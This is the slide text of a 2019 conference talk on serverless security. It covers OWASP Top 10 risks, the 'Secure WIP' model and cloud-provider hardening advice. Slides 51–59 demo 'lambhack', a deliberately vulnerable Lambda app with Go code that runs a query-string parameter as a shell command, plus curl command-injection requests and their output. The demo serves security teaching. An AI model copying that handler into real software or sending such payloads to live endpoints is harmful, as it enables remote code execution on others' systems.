  • 5. Where we are going * Serverless changes the security landscape * Where security fits into serverless * The Secure WIP model for serverless * A quick look at lambhack * Serverless provider security tips @wickett + @iteration1 @ Serverless Days Austin 2019
  • 6. What is Serverless? @wickett + @iteration1 @ Serverless Days Austin 2019
  • 7. Serverless Definition @wickett + @iteration1 @ Serverless Days Austin 2019
  • 8. Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation. @wickett + @iteration1 @ Serverless Days Austin 2019
  • 9. @wickett + @iteration1 @ Serverless Days Austin 2019
  • 10.
  • 11. Serverless is IT Value @wickett + @iteration1 @ Serverless Days Austin 2019
  • 12. ...without worrying about system operation — About 2 minutes ago @wickett + @iteration1 @ Serverless Days Austin 2019
  • 13. Yasss! Ops (and security) for free! @wickett + @iteration1 @ Serverless Days Austin 2019
  • 14. Ops burden to rationalize serverless model — @patrickdebois @wickett + @iteration1 @ Serverless Days Austin 2019
  • 15. Tech burden can only be transferred @wickett + @iteration1 @ Serverless Days Austin 2019
  • 16. Applies to security too @wickett + @iteration1 @ Serverless Days Austin 2019
  • 17. Security burden is not created or destroyed (in serverless), merely transferred @wickett + @iteration1 @ Serverless Days Austin 2019
  • 18. Security is in crisis @wickett + @iteration1 @ Serverless Days Austin 2019
  • 19. Inequitable Labor Distribution @wickett + @iteration1 @ Serverless Days Austin 2019
  • 20. 10:1 Dev:Ops @wickett + @iteration1 @ Serverless Days Austin 2019
  • 21. 100:10:1 Dev:Ops:Sec @wickett + @iteration1 @ Serverless Days Austin 2019
  • 22. The new OSI model @wickett + @iteration1 @ Serverless Days Austin 2019
  • 23. Security knows the crisis is real @wickett + @iteration1 @ Serverless Days Austin 2019
  • 24. Companies are spending a great deal on security, but we read of massive computer-related attacks. Clearly something is wrong. The root of the problem is twofold: we’re protecting the wrong things, and we’re hurting productivity in the process. @wickett + @iteration1 @ Serverless Days Austin 2019
  • 25. [Security by risk assessment] introduces a dangerous fallacy: that structured inadequacy is almost as good as adequacy and that underfunded security efforts plus risk management are about as good as properly funded security work @wickett + @iteration1 @ Serverless Days Austin 2019
  • 26. And the survey says @wickett + @iteration1 @ Serverless Days Austin 2019
  • 27. While engineering teams are busy deploying leading-edge technologies, security teams are still focused on fighting yesterday’s battles. SANS 2018 DevSecOps Survey @wickett + @iteration1 @ Serverless Days Austin 2019
  • 28. 95% of security professionals spend their time protecting legacy applications @wickett + @iteration1 @ Serverless Days Austin 2019
  • 29. "many security teams work with a worldview where their goal is to inhibit change as much as possible" @wickett + @iteration1 @ Serverless Days Austin 2019
  • 30. Serverless model doesn't fit into security team's worldview @wickett + @iteration1 @ Serverless Days Austin 2019
  • 31. How do we change this? @wickett + @iteration1 @ Serverless Days Austin 2019
  • 32. WIP@wickett + @iteration1 @ Serverless Days Austin 2019
  • 33. Secure WIP for Serverless → The code that you actually write → The code you inherited → The container you were provided @wickett + @iteration1 @ Serverless Days Austin 2019
  • 34. Secure WIP means collaboration DevSecOps @wickett + @iteration1 @ Serverless Days Austin 2019
  • 35. WIP @wickett + @iteration1 @ Serverless Days Austin 2019
  • 36. How to WIP? @wickett + @iteration1 @ Serverless Days Austin 2019
  • 38. OWASP Top 10 (2017) @wickett + @iteration1 @ Serverless Days Austin 2019
  • 39. VERY relevant in serverless * A1 Injection * A5 Broken Access Control * A6 Security Misconfiguration * A9 Components with known vulnerabilities * A10 Insufficient Logging & Monitoring ..talk about these as we go along.. @wickett + @iteration1 @ Serverless Days Austin 2019
  • 40. Secure WIP @wickett + @iteration1 @ Serverless Days Austin 2019
  • 41. Secure WIP Write @wickett + @iteration1 @ Serverless Days Austin 2019
  • 42. OWASP A1-Injection Issue: Data coming is hostile * Same issues as in traditional apps, but more prevalent. * Frontend frameworks made this transparent before. @wickett + @iteration1 @ Serverless Days Austin 2019
  • 43. OWASP A1-Injection What should I do? * Keep your data seperate from commands/queries. * Verify you are sanitizing any data being stored. * Pay attention to input validation. * Use whitelist validation wherever possible. @wickett + @iteration1 @ Serverless Days Austin 2019
  • 44. OWASP A5-Broken Access Control Issue: Users cannot act outside their intended permissions. * URL Modificiations Example: lambhack demo with uname * Metadata, Header manipulation * Token Expiration (or lack thereof) @wickett + @iteration1 @ Serverless Days Austin 2019
  • 45. OWASP A5-Broken Access Control What do I do? * Deny by default strategy * Have an access control mechanism in place * Rate limit against automated tooling * Log the failures (but not the sensitive data) @wickett + @iteration1 @ Serverless Days Austin 2019
  • 46. Serverless Myth @wickett + @iteration1 @ Serverless Days Austin 2019
  • 47. You can't do command execution through the API gateway — Anonymous Developer @wickett + @iteration1 @ Serverless Days Austin 2019
  • 48. @wickett + @iteration1 @ Serverless Days Austin 2019
  • 49. Vulnerable Lambda + API Gateway stack → Wanted to see make the point that appsec is relevant in serverless → Born from the heritage of WebGoat, Rails Goat … @wickett + @iteration1 @ Serverless Days Austin 2019
  • 50.
  • 51. Lambhack → A Vulnerable Lambda + API Gateway stack → Open Source, MIT licensed → Includes arbitrary code execution in a query string @wickett + @iteration1 @ Serverless Days Austin 2019
  • 52. Basically a reverse shell in http query string for lambda @wickett + @iteration1 @ Serverless Days Austin 2019
  • 53. func lambhackEvent(event *json.RawMessage, context *sparta.LambdaContext, w http.ResponseWriter, logger *logrus.Logger) { var lambdaEvent sparta.APIGatewayLambdaJSONEvent _ = json.Unmarshal([]byte(*event), &lambdaEvent) command := lambdaEvent.QueryParams["args"] output := runner.Run(command) logger.WithFields(logrus.Fields{ "Event": string(*event), "Command": string(command), "Output": string(output), }).Info("Request received") fmt.Fprintf(w, output) time.Sleep(time.Second) }
  • 54. $ make provision go run main.go provision -s lambhack INFO[0000] ======================================== INFO[0000] Welcome to LambhackApplication GoVersion=go1.10 LinkFlags= Option=provision SpartaSHA=740028b SpartaVersion=0.20.1 UTC="2019-02-21T21:09:50Z" INFO[0000] ======================================== INFO[0000] Provisioning service BuildID=8ffac7d463903457c5dc3221d5bf2b5fa0ee589c CodePipelineTrigger= InPlaceUpdates=false NOOP=false Tags= INFO[0000] Verifying IAM Lambda execution roles INFO[0000] IAM roles verified Count=1 INFO[0000] Checking S3 versioning Bucket=lambhack VersioningEnabled=false INFO[0000] Running `go generate` INFO[0000] Compiling binary Name=Sparta.lambda.amd64 INFO[0011] Executable binary size KB=22560 MB=22 INFO[0011] Creating code ZIP archive for upload TempName=./.sparta/LambhackApplication-code.zip INFO[0011] Registering Sparta JS function FunctionName=main_lambhackEvent ScriptName=main_lambhackEvent INFO[0011] Lambda function deployment package size KB=22659 MB=22 @wickett + @iteration1 @ Serverless Days Austin 2019
  • 56. uname -a curl “<URL>/lambhack/c?args=uname+-a;+sleep+1" returns "Linux ip-10-131-13-166 4.14.94-73.73.amzn1.x86_64 #1 SMP Tue Jan 22 20:25:24 UTC 2019 x86_64 x86_64 x86_64 GNU/Linuxn" @wickett + @iteration1 @ Serverless Days Austin 2019
  • 57. /proc/version curl “<URL>/lambhack/c?args=cat+/proc/version;+sleep+1" returns "Linux version 4.14.94-73.73.amzn1.x86_64 (mockbuild@gobi-build-64001) (gcc version 7.2.1 20170915 (Red Hat 7.2.1-2) (GCC)) #1 SMP Tue Jan 22 20:25:24 UTC 2019n"
  • 58. Look in /tmp curl “<URL>/lambhack/c?args=ls+-la+/tmp;+sleep+1" returns total 8 drwx------ 2 sbx_user1064 482 4096 Feb 21 22:35 . drwxr-xr-x 21 root root 4096 Feb 21 17:51 .. @wickett + @iteration1 @ Serverless Days Austin 2019
  • 59. I can haz web proxy curl “<URL>/lambhack/c?args=curl+https://www.example.com;+sleep+1" returns <!doctype html> <html> <head> <title>Example Domain</title> <meta charset="utf-8" /> ...
  • 60. github.com/wickett/lambhack @wickett + @iteration1 @ Serverless Days Austin 2019
  • 61. AppSec Thoughts from Lambhack → Lambda has limited Blast Radius, but not zero → Monitoring/Logging plays a key role here → Detect longer run times → Higher error rate occurrences → Log actions of lambdas @wickett + @iteration1 @ Serverless Days Austin 2019
  • 62. Secure WIP Inherit @wickett + @iteration1 @ Serverless Days Austin 2019
  • 63. It all seems so simple... 222 Lines of Code 5 direct dependencies 54 total deps (incl. indirect) (example thanks to snyk.io) @wickett + @iteration1 @ Serverless Days Austin 2019
  • 64. 460,046 Lines of Code @wickett + @iteration1 @ Serverless Days Austin 2019
  • 65. Most defect density studies range from .5 to 10 defects per KLOC @wickett + @iteration1 @ Serverless Days Austin 2019
  • 66. More importantly, defect density is not zero @wickett + @iteration1 @ Serverless Days Austin 2019
  • 67. Vulnerabilities are just exploitable defects @wickett + @iteration1 @ Serverless Days Austin 2019
  • 68.
  • 69. OWASP-A9 Components with known vulnerabilities What should I do? * Monitor dependencies continuously. * If you use a Docker based system, use the registry scanning tools. * Watch for CVE's (they will happen). @wickett + @iteration1 @ Serverless Days Austin 2019
  • 70. OWASP-A6 Security Misconfiguration Issue: Configuration or misconfiguration * Function permissiveness and roles (too much privilege) * Configuration for services (supporting cloud based services) * Security configuration left in logging @wickett + @iteration1 @ Serverless Days Austin 2019
  • 71. OWASP-A6 Security Misconfiguration What should I do? * Consider limiting your blast radius * Harden security provider config (IAM/storage) * Scan for global bucket read/write access * Use a principle of least privilege * Enterprise setting: MFA to access cloud console @wickett + @iteration1 @ Serverless Days Austin 2019
  • 72. Most common attacks (Via puresec whitepaper) → Crypto Mining (via remote code execution) → Hijacking business flow → Denial of wallet → Data misconfiguration @wickett + @iteration1 @ Serverless Days Austin 2019
  • 73. Secure WIP Provided @wickett + @iteration1 @ Serverless Days Austin 2019
  • 74. Platform Help @wickett + @iteration1 @ Serverless Days Austin 2019
  • 75. Vendor Best Practices → AWS → Google Cloud → Azure → Oracle Cloud Infrastructure @wickett + @iteration1 @ Serverless Days Austin 2019
  • 76. AWS @wickett + @iteration1 @ Serverless Days Austin 2019
  • 77. Gone in 60 Milliseconds Intrusion and Exfiltration in Server-less Architecture https://media.ccc.de/v/33c3-7865- gonein60_milliseconds @wickett + @iteration1 @ Serverless Days Austin 2019
  • 78. Focus on IAM Roles and Policies @wickett + @iteration1 @ Serverless Days Austin 2019
  • 79. Good hygiene * Disable root access keys * Manage users with profiles * Secure your keys in your deploy system * Secure keys in dev system * Use provider MFA @wickett + @iteration1 @ Serverless Days Austin 2019
  • 80. AWS lets you roll your own @wickett + @iteration1 @ Serverless Days Austin 2019
  • 81.
  • 82. Choose your own adventure → Your very own Honeypot → Defend scanners and attack tooling → Parsing reputation lists → Deal with whitelisting/blacklisting → Tuning WAF Regex rules @wickett + @iteration1 @ Serverless Days Austin 2019
  • 83. Cool, but not exactly a friendly setup for devs or ops @wickett + @iteration1 @ Serverless Days Austin 2019
  • 84. Azure → Lots of great resources in the docs → Overview → Security Policy → Key Vault Service @wickett + @iteration1 @ Serverless Days Austin 2019
  • 85. Google Cloud → Follow IAM and data best practices → Security command → Storage best practices @wickett + @iteration1 @ Serverless Days Austin 2019
  • 86. Oracle Cloud Infrastructure → Use compartments concepts and IAM to limit blast radius → Limit specific user/group access to specific compartments → Security guidance @wickett + @iteration1 @ Serverless Days Austin 2019
  • 87. What about roll your own? → Knative → OpenFaaS → Fn → and others... @wickett + @iteration1 @ Serverless Days Austin 2019
  • 88. Kubernetes Security → Many Faas providers can use K8s to deploy/scale → Use K8s best practices → Starting point- SignalSciences Webinar on cloudnative security @wickett + @iteration1 @ Serverless Days Austin 2019
  • 89. Security Pitfalls for serverless * Auditors/Compliance * Lack of instrumentation * Lack of security controls in dev pipeline * Provider config * Lambhack as a way to facilitate conversations @wickett + @iteration1 @ Serverless Days Austin 2019
  • 90. Security's Path to Influence 1. Identify Resource Misutilization 2. Add Telemetry and Feedback Loops 3. Automate and Monitor Across the Software Pipeline 4. Influence Organizational Culture
  • 91. The New Security Playbook * Speed up delivery instead of blocking * Empathy towards devs and ops * Normal - provide value by making security normal * Automate - security testing in every phase @wickett + @iteration1 @ Serverless Days Austin 2019
  • 92. Conclusions * Use the Secure WIP model * Involve security team in serverless * New Security Playbook * Foster discussion on where to apply controls @wickett + @iteration1 @ Serverless Days Austin 2019
  • 93. Want the slides? james@signalsciences.com @wickett + @iteration1 @ Serverless Days Austin 2019